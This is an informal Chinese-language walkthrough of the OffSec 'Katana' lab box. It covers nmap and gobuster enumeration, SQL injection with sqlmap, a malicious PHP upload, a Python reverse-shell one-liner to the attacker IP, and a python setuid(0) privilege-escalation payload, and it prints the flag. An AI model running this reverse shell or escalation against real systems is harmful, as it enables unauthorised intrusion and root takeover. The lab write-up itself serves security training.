offsec hw - HackMD

# Katana [toc] --- ## 進入先nmapscan ![image](https://hackmd.io/_uploads/BkB2HHAZ1x.png) ![image](https://hackmd.io/_uploads/BJrbyBA-1e.png) ![image](https://hackmd.io/_uploads/SyteIHA-Jg.png) 先去80那裡就...一張圖片（別說還挺好看） ![image](https://hackmd.io/_uploads/BySBUS0bke.png) 題外話結束，先gobuster啟動 ![image](https://hackmd.io/_uploads/rJSwPHAWyg.png) 到ebook找到了一個sqli的點 ```http://192.168.243.83/ebook/book.php?bookisbn=978-1-118-94924-5``` sqlmap--啟動 ![image](https://hackmd.io/_uploads/ryRXKHC-Jl.png) ![image](https://hackmd.io/_uploads/S139tH0Zye.png) 去翻admin(看起來就可疑) ![image](https://hackmd.io/_uploads/S1WlqH0Zyl.png) 好欸有密碼了去登入看看可以上傳檔案!!! ![image](https://hackmd.io/_uploads/BJAQcSCZ1e.png) 好吧不給傳 ![image](https://hackmd.io/_uploads/r1dKqr0bkx.png) 新增也不行 ![image](https://hackmd.io/_uploads/SJOiqrAZ1g.png) 那只能繼續gobuster 然後 8088那裡有趣的出現了 ![image](https://hackmd.io/_uploads/SJbkjHRbyg.png) upload.php/html 進去看看 ![image](https://hackmd.io/_uploads/rJHzsS0-Je.png) 好欸上傳壞壞的php ![image](https://hackmd.io/_uploads/rkTBsr0Wyl.png) 但80和8088都沒有然後我突然想到還有個8715 進去找路徑後發現可以！ ![image](https://hackmd.io/_uploads/SkxEihSAWye.png) 好欸直接reverse shell ``` export RHOST="192.168.45.167";export RPORT=4872;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")' ``` ![image](https://hackmd.io/_uploads/BJ7xRrRWkx.png) 好欸拿flag ![image](https://hackmd.io/_uploads/B1mkk8CZkg.png) ## 提權下載linpeas.sh然後run 發現 ![image](https://hackmd.io/_uploads/Hk8VeUCZJe.png) 爬了一下文後找到payload ```./python -c 'import os; os.setuid(0); os.system("/bin/sh")'``` ![image](https://hackmd.io/_uploads/Byy4WUCbkl.png) 成功接著就是 ![image](https://hackmd.io/_uploads/S1_LZ8RWyx.png) flag```cbdab17e2513b3f9d6fdf5d01d0133ab``` flag的沒有格式阿阿阿阿阿